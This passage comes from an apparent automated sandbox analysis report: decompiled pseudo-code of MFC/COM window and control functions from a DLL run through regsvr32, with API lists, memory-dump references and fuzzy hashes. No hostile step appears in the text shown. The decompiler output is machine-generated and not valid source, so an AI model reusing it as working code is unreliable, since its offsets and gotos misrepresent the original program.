					_t194 =  *_t236;
					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
					_t236 =  &(_t236[2]);
					if(_t194 > 0) {
						__imp__#4(_t236, _t194);
						_t195 = _t194 + _t194;
						_t236 = _t236 + _t195;
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
						 *(_t246 + 0x24) = _t145;
					}
				}
				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
				E10001050(_t246 + 0x28, _t226, E100173A6());
				 *((intOrPtr*)(_t246 - 4)) = 0;
				 *(_t246 + 0xc) = 0;
				 *(_t246 + 0x10) = 0;
				 *(_t246 + 0x18) = 0;
				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
					_t148 =  *_t236;
					_t57 = _t148 - 0xc; // -12
					_t226 = _t57;
					_t236 =  &(_t236[6]);
					 *_t246 = _t148;
					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
					if(_t226 <= 0) {
						L16:
						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t177 =  *_t236;
						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
						_t242 =  &(_t236[2]);
						_t193 =  *_t242 & 0x0000ffff;
						_t236 =  &(_t242[1]);
						 *(_t246 + 4) = _t177;
						if(_t177 != 0x80010001) {
							_t178 = E100160BC(__eflags, 0x1c);
							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
							__eflags = _t178;
							 *((char*)(_t246 - 4)) = 1;
							if(_t178 == 0) {
								_t179 = 0;
								__eflags = 0;
							} else {
								_t179 = E1002F888(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
							}
							 *((char*)(_t246 - 4)) = 0;
							 *(_t246 + 0x20) = _t179;
						} else {
							_t244 =  &(_t236[2]);
							 *(_t246 + 0x10) =  *_t236;
							_t245 =  &(_t244[6]);
							 *(_t246 + 0x18) =  *_t244;
							E10002070(_t226, _t233, _t245);
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
							_t221 = 0xffffffef;
							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
							_t236 = _t245 + _t184 + 1;
							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
						}
					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
					_t148 =  *_t246;
					goto L16;
				} else {
					L17:
					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
					_t263 =  *_t149 - 0x7b;
					_push(_t246 + 0x38);
					_push(_t149);
					if( *_t149 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_t190 = 0;
					_push(0);
					_push( *((intOrPtr*)(_t246 + 0x6c)));
					_push(_t236);
					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
					E10037D5A(0, _t246 - 0x5c, _t233, _t236, _t263);
					 *((char*)(_t246 - 4)) = 2;
					 *((intOrPtr*)(_t246 + 0x34)) = 0;
					asm("sbb esi, esi");
					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
						_push(1);
						if(E1001E059(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E1001E641( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
							E1002EEA9( *((intOrPtr*)(_t246 + 0x34)), 1);
							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
							_push(_t246 + 0x28);
							E10001FF0( *((intOrPtr*)(_t246 + 0x34)) + 0xa4);
							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
						}
					}
					if( *(_t246 + 0x24) != _t190) {
						__imp__#6( *(_t246 + 0x24));
					}
					_t152 =  *((intOrPtr*)(_t246 + 0x34));
					if(_t152 == _t190) {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
						_t190 = 1;
					}
					 *((char*)(_t246 - 4)) = 0;
					E100380BC(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
					E10001020( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
					_pop(_t234);
					_pop(_t241);
					_pop(_t191);
					return E1003B437(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
				}
			}

































                                                                                                                0x10029952
                                                                                                                0x10029956
                                                                                                                0x1002995d
                                                                                                                0x10029960
                                                                                                                0x10029967
                                                                                                                0x10029973
                                                                                                                0x10029976
                                                                                                                0x10029979
                                                                                                                0x1002997f
                                                                                                                0x10029985
                                                                                                                0x10029988
                                                                                                                0x1002998b
                                                                                                                0x1002998e
                                                                                                                0x10029996
                                                                                                                0x1002999c
                                                                                                                0x100299a3
                                                                                                                0x100299ad
                                                                                                                0x100299b5
                                                                                                                0x100299bd
                                                                                                                0x100299c0
                                                                                                                0x100299c4
                                                                                                                0x100299c8
                                                                                                                0x100299cb
                                                                                                                0x100299cb
                                                                                                                0x100299ce
                                                                                                                0x100299d6
                                                                                                                0x100299e0
                                                                                                                0x100299ef
                                                                                                                0x100299f2
                                                                                                                0x100299f5
                                                                                                                0x100299f8
                                                                                                                0x100299fe
                                                                                                                0x10029a06
                                                                                                                0x10029a08
                                                                                                                0x10029a0a
                                                                                                                0x10029a0e
                                                                                                                0x10029a13
                                                                                                                0x10029a17
                                                                                                                0x10029a1d
                                                                                                                0x10029a1f
                                                                                                                0x10029a21
                                                                                                                0x10029a24
                                                                                                                0x10029a24
                                                                                                                0x10029a13
                                                                                                                0x10029a27
                                                                                                                0x10029a34
                                                                                                                0x10029a41
                                                                                                                0x10029a44
                                                                                                                0x10029a47
                                                                                                                0x10029a4a
                                                                                                                0x10029a4d
                                                                                                                0x10029a5b
                                                                                                                0x10029a5d
                                                                                                                0x10029a5d
                                                                                                                0x10029a60
                                                                                                                0x10029a65
                                                                                                                0x10029a68
                                                                                                                0x10029a6b
                                                                                                                0x10029af1
                                                                                                                0x10029af1
                                                                                                                0x10029af4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10029a71
                                                                                                                0x10029a71
                                                                                                                0x10029a71
                                                                                                                0x10029a73
                                                                                                                0x10029a77
                                                                                                                0x10029a7a
                                                                                                                0x10029a7e
                                                                                                                0x10029a84
                                                                                                                0x10029a87
                                                                                                                0x10029abe
                                                                                                                0x10029ac4
                                                                                                                0x10029ac7
                                                                                                                0x10029ac9
                                                                                                                0x10029acd
                                                                                                                0x10029adf
                                                                                                                0x10029adf
                                                                                                                0x10029acf
                                                                                                                0x10029ad8
                                                                                                                0x10029ad8
                                                                                                                0x10029ae1
                                                                                                                0x10029ae5
                                                                                                                0x10029a89
                                                                                                                0x10029a8b
                                                                                                                0x10029a8e
                                                                                                                0x10029a93
                                                                                                                0x10029a9a
                                                                                                                0x10029a9d
                                                                                                                0x10029aa5
                                                                                                                0x10029aaa
                                                                                                                0x10029aad
                                                                                                                0x10029ab0
                                                                                                                0x10029ab7
                                                                                                                0x10029ab7
                                                                                                                0x10029ae8
                                                                                                                0x10029aee
                                                                                                                0x00000000
                                                                                                                0x10029afb
                                                                                                                0x10029afb
                                                                                                                0x10029afb
                                                                                                                0x10029afe
                                                                                                                0x10029b05
                                                                                                                0x10029b06
                                                                                                                0x10029b07
                                                                                                                0x10029b11
                                                                                                                0x10029b09
                                                                                                                0x10029b09
                                                                                                                0x10029b09
                                                                                                                0x10029b17
                                                                                                                0x10029b19
                                                                                                                0x10029b1a
                                                                                                                0x10029b20
                                                                                                                0x10029b21
                                                                                                                0x10029b24
                                                                                                                0x10029b38
                                                                                                                0x10029b3c
                                                                                                                0x10029b3f
                                                                                                                0x10029b41
                                                                                                                0x10029b43
                                                                                                                0x10029b46
                                                                                                                0x10029b4f
                                                                                                                0x10029b58
                                                                                                                0x10029b97
                                                                                                                0x10029bab
                                                                                                                0x10029bb7
                                                                                                                0x10029bc9
                                                                                                                0x10029bca
                                                                                                                0x10029bd6
                                                                                                                0x10029be3
                                                                                                                0x10029bef
                                                                                                                0x10029bef
                                                                                                                0x10029b58
                                                                                                                0x10029bf8
                                                                                                                0x10029bfd
                                                                                                                0x10029bfd
                                                                                                                0x10029c03
                                                                                                                0x10029c08
                                                                                                                0x10029c50
                                                                                                                0x10029c0a
                                                                                                                0x10029c12
                                                                                                                0x10029c14
                                                                                                                0x10029c14
                                                                                                                0x10029c18
                                                                                                                0x10029c1c
                                                                                                                0x10029c27
                                                                                                                0x10029c31
                                                                                                                0x10029c39
                                                                                                                0x10029c3a
                                                                                                                0x10029c3b
                                                                                                                0x10029c4a
                                                                                                                0x10029c4a

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10029967
                                                                                                                • MapDialogRect.USER32(?,00000000), ref: 100299F8
                                                                                                                • SysAllocStringLen.OLEAUT32(?,?), ref: 10029A17
                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 10029B09
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • CLSIDFromProgID.OLE32(?,?), ref: 10029B11
                                                                                                                • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10029BAB
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10029BFD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2841959276-0
                                                                                                                • Opcode ID: 2fbf502c7e0bb68af6b3fc4472b3d2ce227007631d1c32c4c8fad4cf1d709ddf
                                                                                                                • Instruction ID: bb67a85301bd41c9e07bc110d845517d056f41f7d71d6ac9e2af78a6986229ac
                                                                                                                • Opcode Fuzzy Hash: 2fbf502c7e0bb68af6b3fc4472b3d2ce227007631d1c32c4c8fad4cf1d709ddf
                                                                                                                • Instruction Fuzzy Hash: E4B10075900249AFDB04DF68D984AEEBBF4FF08384F41812AFC1997251E774E984CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003442D Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E1003442D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t103;
				intOrPtr _t120;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = __edx;
				_push(0x6c);
				E1003D1E6(E10054ACB, __ebx, __edi, __esi);
				_t122 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t123 - 0x14) = 0;
				 *(_t123 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L18:
					 *(_t122 + 0x44) =  *(_t122 + 0x44) & 0x00000000;
					return E1003D2BE(0);
				} else {
					goto L1;
				}
				do {
					L1:
					_t108 =  *(_t123 - 0x10) * 0x28;
					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x14)) + 0x24 +  *(_t123 - 0x10) * 0x28));
					if(_t76 == 0) {
						goto L17;
					}
					_t78 =  *((intOrPtr*)(_t76 + 4));
					 *((intOrPtr*)(_t123 - 0x20)) = _t78;
					if(_t78 == 0) {
						goto L17;
					}
					 *(_t123 - 0x18) =  *(_t123 - 0x14) << 4;
					do {
						_t120 =  *((intOrPtr*)(E100182A6(_t123 - 0x20)));
						 *((intOrPtr*)(_t123 - 0x24)) = 0xfffffffd;
						E1003BB70(_t120, _t123 - 0x78, 0, 0x20);
						_t124 = _t124 + 0xc;
						E1002A12B(_t123 - 0x48);
						 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
						_t130 =  *((intOrPtr*)(_t122 + 0x48));
						if( *((intOrPtr*)(_t122 + 0x48)) == 0) {
							_t89 =  *((intOrPtr*)(_t122 + 0x40)) +  *(_t123 - 0x18);
							__eflags = _t89;
						} else {
							_t103 = E10033F16(_t108, _t122, _t116, _t120, _t122, _t130);
							 *(_t123 - 4) = 1;
							E1002A10B(_t103, _t123 - 0x48, _t103);
							 *(_t123 - 4) = 0;
							__imp__#9(_t123 - 0x58, _t123 - 0x58,  *(_t123 - 0x10) + 1);
							_t89 = _t123 - 0x48;
						}
						 *((intOrPtr*)(_t123 - 0x38)) = _t89;
						 *((intOrPtr*)(_t123 - 0x34)) = _t123 - 0x24;
						 *((intOrPtr*)(_t123 - 0x30)) = 1;
						 *((intOrPtr*)(_t123 - 0x2c)) = 1;
						 *(_t120 + 0x88) = 1;
						_t93 =  *((intOrPtr*)(_t120 + 0x50));
						if(_t93 != 0) {
							_t116 = _t123 - 0x1c;
							_push(_t123 - 0x1c);
							_push(0x1005f974);
							_push(_t93);
							if( *((intOrPtr*)( *_t93))() >= 0) {
								_t96 =  *((intOrPtr*)(_t123 - 0x1c));
								_t116 = _t123 - 0x38;
								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t120 + 0x9c)), 0x1005fa04, 0, 4, _t123 - 0x38, 0, _t123 - 0x78, _t123 - 0x28);
								_t98 =  *((intOrPtr*)(_t123 - 0x1c));
								 *((intOrPtr*)( *_t98 + 8))(_t98);
								 *(_t120 + 0x88) =  *(_t120 + 0x88) & 0x00000000;
								if( *((intOrPtr*)(_t123 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x74)));
								}
								if( *((intOrPtr*)(_t123 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x70)));
								}
								if( *((intOrPtr*)(_t123 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x6c)));
								}
								 *(_t123 - 0x14) =  *(_t123 - 0x14) + 1;
								 *(_t123 - 0x18) =  *(_t123 - 0x18) + 0x10;
							}
						}
						 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
						__imp__#9(_t123 - 0x48);
					} while ( *((intOrPtr*)(_t123 - 0x20)) != 0);
					L17:
					 *(_t123 - 0x10) =  *(_t123 - 0x10) + 1;
				} while ( *(_t123 - 0x10) <  *((intOrPtr*)(_t122 + 0x10)));
				goto L18;
			}














                                                                                                                0x1003442d
                                                                                                                0x1003442d
                                                                                                                0x10034434
                                                                                                                0x10034439
                                                                                                                0x10034440
                                                                                                                0x10034447
                                                                                                                0x1003444a
                                                                                                                0x1003444d
                                                                                                                0x100345b3
                                                                                                                0x100345b3
                                                                                                                0x100345be
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10034453
                                                                                                                0x10034453
                                                                                                                0x10034459
                                                                                                                0x1003445c
                                                                                                                0x10034462
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10034468
                                                                                                                0x1003446d
                                                                                                                0x10034470
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003447c
                                                                                                                0x1003447f
                                                                                                                0x1003448f
                                                                                                                0x10034499
                                                                                                                0x100344a0
                                                                                                                0x100344a5
                                                                                                                0x100344ac
                                                                                                                0x100344b1
                                                                                                                0x100344b5
                                                                                                                0x100344b9
                                                                                                                0x100344ee
                                                                                                                0x100344ee
                                                                                                                0x100344bb
                                                                                                                0x100344c6
                                                                                                                0x100344cf
                                                                                                                0x100344d3
                                                                                                                0x100344dc
                                                                                                                0x100344e0
                                                                                                                0x100344e6
                                                                                                                0x100344e6
                                                                                                                0x100344f1
                                                                                                                0x100344f7
                                                                                                                0x100344fd
                                                                                                                0x10034500
                                                                                                                0x10034503
                                                                                                                0x10034509
                                                                                                                0x1003450e
                                                                                                                0x10034512
                                                                                                                0x10034515
                                                                                                                0x10034516
                                                                                                                0x1003451b
                                                                                                                0x10034520
                                                                                                                0x10034522
                                                                                                                0x10034531
                                                                                                                0x10034545
                                                                                                                0x10034548
                                                                                                                0x1003454e
                                                                                                                0x10034551
                                                                                                                0x1003455c
                                                                                                                0x10034561
                                                                                                                0x10034561
                                                                                                                0x1003456b
                                                                                                                0x10034570
                                                                                                                0x10034570
                                                                                                                0x1003457a
                                                                                                                0x1003457f
                                                                                                                0x1003457f
                                                                                                                0x10034585
                                                                                                                0x10034588
                                                                                                                0x10034588
                                                                                                                0x10034520
                                                                                                                0x1003458c
                                                                                                                0x10034594
                                                                                                                0x1003459a
                                                                                                                0x100345a4
                                                                                                                0x100345a4
                                                                                                                0x100345aa
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10034434
                                                                                                                • _memset.LIBCMT ref: 100344A0
                                                                                                                  • Part of subcall function 1002A12B: _memset.LIBCMT ref: 1002A133
                                                                                                                • VariantClear.OLEAUT32(?), ref: 100344E0
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10034561
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10034570
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 1003457F
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 10034594
                                                                                                                  • Part of subcall function 10033F16: __EH_prolog3.LIBCMT ref: 10033F32
                                                                                                                  • Part of subcall function 10033F16: VariantClear.OLEAUT32(?), ref: 10033F97
                                                                                                                  • Part of subcall function 1002A10B: VariantCopy.OLEAUT32(?,?), ref: 1002A119
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2905758408-0
                                                                                                                • Opcode ID: 8a3cee275fbd3255d2378654e06d20561fa7fabd1a35d831ceed9d24a6cd2184
                                                                                                                • Instruction ID: cfce0400574360d5a042119d4ab7efdbb1c511c435b70370873c8368bd04af60
                                                                                                                • Opcode Fuzzy Hash: 8a3cee275fbd3255d2378654e06d20561fa7fabd1a35d831ceed9d24a6cd2184
                                                                                                                • Instruction Fuzzy Hash: 4C511374E006099FDB51CFA4C884BEEBBF8FF08305F114529E515EB292DB74AA44CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002728F Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E1002728F(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				signed int _t50;
				signed char _t57;
				void* _t68;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				signed int _t89;

				_t86 = __edx;
				_t43 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t43 ^ _t89;
				_t87 = _a8;
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x110))();
				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t87 + 0xa)) = 0;
				 *((char*)(_t87 + 0xb)) = 0;
				if(E1003D636(_t87,  &_v28, 0x14) != 0) {
					_t50 = E1001D23C(_t88);
					_t69 = _t50;
					_v36 = _t50;
					E1001D270(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, _t68);
					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
						_t69 = _v36;
					}
					 *((intOrPtr*)( *_t88 + 0x110))(_a4, _t87);
					E1001D270(_t88, 0, _t69 & 0x10000000, 0);
					_t57 =  *((intOrPtr*)(_t87 + 9));
					_t68 = 0x415;
					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
						_push(1);
						_push(0);
						goto L9;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
							_push(1);
							_push( &_v52);
							L9:
							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
						}
					}
				}
				return E1003B437(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
			}






















                                                                                                                0x1002728f
                                                                                                                0x10027295
                                                                                                                0x1002729c
                                                                                                                0x100272a1
                                                                                                                0x100272a4
                                                                                                                0x100272ab
                                                                                                                0x100272ac
                                                                                                                0x100272b1
                                                                                                                0x100272b6
                                                                                                                0x100272bc
                                                                                                                0x100272c7
                                                                                                                0x100272cb
                                                                                                                0x100272cf
                                                                                                                0x100272d3
                                                                                                                0x100272e1
                                                                                                                0x100272ea
                                                                                                                0x100272f3
                                                                                                                0x100272fc
                                                                                                                0x100272ff
                                                                                                                0x10027312
                                                                                                                0x1002731c
                                                                                                                0x1002733b
                                                                                                                0x1002733e
                                                                                                                0x1002734f
                                                                                                                0x1002735e
                                                                                                                0x10027369
                                                                                                                0x1002736b
                                                                                                                0x10027372
                                                                                                                0x10027372
                                                                                                                0x10027382
                                                                                                                0x10027395
                                                                                                                0x1002739a
                                                                                                                0x100273a2
                                                                                                                0x100273a6
                                                                                                                0x100273d5
                                                                                                                0x100273d7
                                                                                                                0x00000000
                                                                                                                0x100273b3
                                                                                                                0x100273b8
                                                                                                                0x100273b9
                                                                                                                0x100273be
                                                                                                                0x100273cb
                                                                                                                0x100273cd
                                                                                                                0x100273d2
                                                                                                                0x100273d9
                                                                                                                0x100273dc
                                                                                                                0x100273dc
                                                                                                                0x100273cb
                                                                                                                0x100273a6
                                                                                                                0x100273ef

                                                                                                                APIs
                                                                                                                • _memcmp.LIBCMT ref: 100272D7
                                                                                                                  • Part of subcall function 1001D23C: GetWindowLongA.USER32(?,000000F0), ref: 1001D247
                                                                                                                • SendMessageA.USER32 ref: 10027330
                                                                                                                • SendMessageA.USER32 ref: 1002733E
                                                                                                                • SendMessageA.USER32 ref: 1002734F
                                                                                                                • SendMessageA.USER32 ref: 1002735E
                                                                                                                • SendMessageA.USER32 ref: 10027369
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 100273DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$InvalidateLongRectWindow_memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 235743446-0
                                                                                                                • Opcode ID: f01f067c09bd80f7d76f52cb94a2eac821769c6745212cb122ea07a4b356d0c4
                                                                                                                • Instruction ID: 045eb8fc5185feba0cb7262de9c9630ccf681ca53ba2fbb2d07fe586672410d7
                                                                                                                • Opcode Fuzzy Hash: f01f067c09bd80f7d76f52cb94a2eac821769c6745212cb122ea07a4b356d0c4
                                                                                                                • Instruction Fuzzy Hash: DF418F34640718BFEB21DB64CC56FAEBBB5FF08750F504418FA956A2D1C7B0A940DB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100311C4 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E100311C4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t59;
				signed int _t63;
				signed int _t64;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E1003D1E6(E1005468C, __ebx, __edi, __esi);
				_t97 =  *(_t101 + 8) + 0xffffff28;
				E100231D3(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x14);
					if( *(_t101 - 0x14) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E10022A6E();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E1003D2BE(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *(_t97 + 0x50);
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *(_t101 + 8) = 0;
					__eflags = __eflags != 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x1005f974, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E1003BB70(_t97, _t101 - 0x48, 0, 0x20);
						E1003BB70(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *(_t101 + 8);
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x1005fa04, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *(_t101 - 0x44);
						_t82 = __imp__#6;
						 *(_t101 + 0xc) = _t70;
						if( *(_t101 - 0x44) != 0) {
							 *_t82( *(_t101 - 0x44));
						}
						__eflags =  *(_t101 - 0x40);
						if( *(_t101 - 0x40) != 0) {
							 *_t82( *(_t101 - 0x40));
						}
